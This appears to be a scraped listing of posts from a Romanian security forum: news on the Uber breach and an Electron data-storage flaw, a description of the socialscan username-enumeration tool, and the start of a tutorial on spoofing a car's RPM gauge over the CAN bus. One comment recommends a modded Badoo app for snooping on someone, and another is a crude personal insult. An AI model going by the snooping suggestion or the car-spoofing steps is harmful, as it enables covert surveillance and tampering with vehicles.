idiosyncrasies related to authentication, secure file storage, and communications. Migues said development teams use frameworks for the same reason they use lots of other open source — it makes their jobs easier and faster. On the other hand, even security-aware teams might not understand what’s really going on in the depths of the framework they’re using. Migues said In this case, it appears that Electron might save some sensitive data in an insecure way. Via scmagazine.com/
    1 point
  34. Ride hailing giant Uber disclosed Thursday it's responding to a cybersecurity incident involving a breach of its network and that it's in touch with law enforcement authorities. The New York Times first reported the incident. The company pointed to its tweeted statement when asked for comment on the matter. The hack is said to have forced the company to take its internal communications and engineering systems offline as it investigated the extent of the breach. The publication said the malicious intruder compromised an employee's Slack account, and leveraged it to broadcast a message that the company had "suffered a data breach," in addition to listing internal databases that's supposed to have been compromised. "It appeared that the hacker was later able to gain access to other internal systems, posting an explicit photo on an internal information page for employees," the New York Times said. Uber has yet to offer additional details about the incident, but it seems that the hacker, believed to be an 18-year-old teenager, social-engineered the employee to get hold of their password by masquerading as a corporate IT person and used it to obtain a foothold into the internal network. "Once on the internal network, the attackers found high privileged credentials laying on a network file share and used them to access everything, including production systems, corp EDR console, [and] Uber slack management interface," Kevin Reed, chief information security officer at Acronis, told The Hacker News. This is not Uber's first breach. It came under scrutiny for failing to properly disclose a 2016 data breach affecting 57 million riders and drivers, and ultimately paying off the hackers $100,000 to hide the breach. It became public knowledge only in late 2017. Federal prosecutors in the U.S. have since charged its former security officer, Joe Sullivan, with an alleged attempted cover-up of the incident, stating he had "instructed his team to keep knowledge of the 2016 breach tightly controlled." Sullivan has contested the accusations. In December 2021, Sullivan was handed down additional three counts of wire fraud to previously filed felony obstruction and misprision charges. "Sullivan allegedly orchestrated the disbursement of a six-figure payment to two hackers in exchange for their silence about the hack," the superseding indictment said. It further said he "took deliberate steps to prevent persons whose PII was stolen from discovering that the hack had occurred and took steps to conceal, deflect, and mislead the U.S. Federal Trade Commission (FTC) about the data breach." The latest breach also comes as the criminal case against Sullivan went to trial in the U.S. District Court in San Francisco. "The compromise is certainly bigger compared to the breach in 2016," Reed said. "Whatever data Uber keeps, the hackers most probably already have access." Source: https://thehackernews.com/2022/09/uber-says-its-investigating-potential.html
    1 point
  35. Cred că ar fi mai ușor și mai legal să ai o conversație sinceră sau să angajezi un detectiv. Sau instalați imediat Badoo Mod APK pentru a căuta în baza de date de întâlniri.
    1 point
  36. Facui update si la IPBoard si la tema dar se pare ca problemele persista, nu am idee de ce si nici nu am timp sa investighez
    1 point
  37. >Zi de zi ma cert cu viata
    1 point
  38. socialscan is an accurate command-line tool to check For email and social media username usage on online platforms, given an email address or username, socialscan returns whether it is available, taken or invalid on online platforms. Other similar tools check username availability by requesting the profile page of the username in question and based on information like the HTTP status code or error text on the requested page, determine whether a username is already taken. This is a naive approach that fails in the following cases: Reserved keywords: Most platforms have a set of keywords that they don’t allow to be used in usernames (A simple test: try checking reserved words like ‘admin’ or ‘home’ or ‘root’ and see if other services mark them as available) Deleted/banned accounts: Deleted/banned account usernames tend to be unavailable even though the profile pages might not exist Therefore, these tools tend to come up with false positives and negatives. This method of checking is also dependent on platforms having web-based profile pages and cannot be extended to email addresses. socialscan aims to plug these gaps by directly querying the registration servers of the platforms instead, retrieving the appropriate CSRF tokens, headers, and cookies. Install Socialscan Command-Line Tool To Check For Email And Social Media Username Usage pip > pip install socialscan > git clone https://github.com/iojw/socialscan.git > cd socialscan > pip install . ocialscan Command-Line Tool To Check For Email And Social Media Username Usage usage: socialscan [list of usernames/email addresses to check] optional arguments: -h, --help show this help message and exit --platforms [platform [platform ...]], -p [platform [platform ...]] list of platforms to query (default: all platforms) --view-by {platform,query} view results sorted by platform or by query (default: query) --available-only, -a only print usernames/email addresses that are available and not in use --cache-tokens, -c cache tokens for platforms requiring more than one HTTP request (Snapchat, GitHub, Instagram. Lastfm & Tumblr), reducing total number of requests sent --input input.txt, -i input.txt file containg list of queries to execute --proxy-list proxy_list.txt file containing list of HTTP proxy servers to execute queries with --verbose, -v show query responses as they are received --show-urls display profile URLs for usernames on supported platforms (profiles may not exist if usernames are reserved or belong to deleted/banned accounts) --json json.txt output results in JSON format to the specified file --version show program's version number and exit You can download Socialscan here: socialscan-v1.4.2.zip Or read more here. Sources: darknet.org.uk github.com
    1 point
  39. Arunca un ochi si pe aici https://regexlib.com/ si https://regex101.com/
    1 point
  40. The goal of this article is to get you started hacking cars — fast, cheap, and easy. In order to do this, we’ll spoof the RPM gauge as an example. The following is by no means an exhaustive tutorial. It instead aims to provide just enough information to get you up and running. If you want to dig deeper you can checkout the must-reads at the end. If you decide to carry out this tutorial in real life, you’ll need a Linux computer (or a virtual Linux machine), and a CAN-to-USB device (which we’ll look into later). A car is a network A car consists of multiple computers to control the engine, transmission, windows, locks, lights, etc. These computers are called electronic control units (ECU) and communicate with each other over a network. For example, when you press the button on your steering wheel to increase the volume of the radio, the steering wheel ECU sends a command to increase volume onto the network, the radio ECU then sees this command and acts accordingly. There are multiple networks in a car, generally at least two: One for critical data such as engine and powertrain messages And one for less critical data such as radio and door locks The critical network uses a fast and reliable protocol whereas the non-critical network uses a slower, less reliable but cheaper protocol. The number of networks as well as which ECUs are networked together depends on the car make, model and year. An ECU could also be connected to multiple networks. Reference link : https://www.freecodecamp.org/news/hacking-cars-a-guide-tutorial-on-how-to-hack-a-car-5eafcfbbb7ec/ Connecting to a network Some networks can be accessed via the OBD-II port. OBD-II is mandatory on all cars and light trucks built in the US after 1996 and Europe after 2004. The connector is in arms reach of the driver’s seat. You might need to lift off some plastic cover but it is always accessible without tools. Software To communicate with the device you need to install the can-utils package on your Linux machine. You can do this via by typing the following into the Linux prompt: sudo apt-get install can-utils Can-utils makes it extremely easy to send, receive and analyze CAN packets. These are the commands that we will use. cansniffer display only the packets that are changing candump dump all received packets cansend send a packet Linux has CAN support built in to the kernel via SocketCAN. This makes it easy to write your own additional programs. You can interact with the CAN bus in the same way you would interact with any other network i.e. via sockets.
    1 point
  41. coaie esti retard in pula mea? cine pula mea a spus ceva de acel forum aici pe RST nu vezi ca deviezi de la subiect ... inchide PC-ul si relaxeaza-te fa ceva util cu viata ta ... nu mai cauta sa iti umplii portofoliul cu un asa caracter nu poti dovedi ca ai mai mult de 16 anisori, dupa ce o sa devii major o sa intelegi mai multe lucruri, te salut! P.S: Te rog sa ii transmiti tatalui tau sa foloseasca in "plm" prezervative sa nu mai avem neplaceri ca tine pe lume. Copil copac daca dai -1 te simti mai mandru? esti ridicol. x2
    1 point
×
×
  • Create New...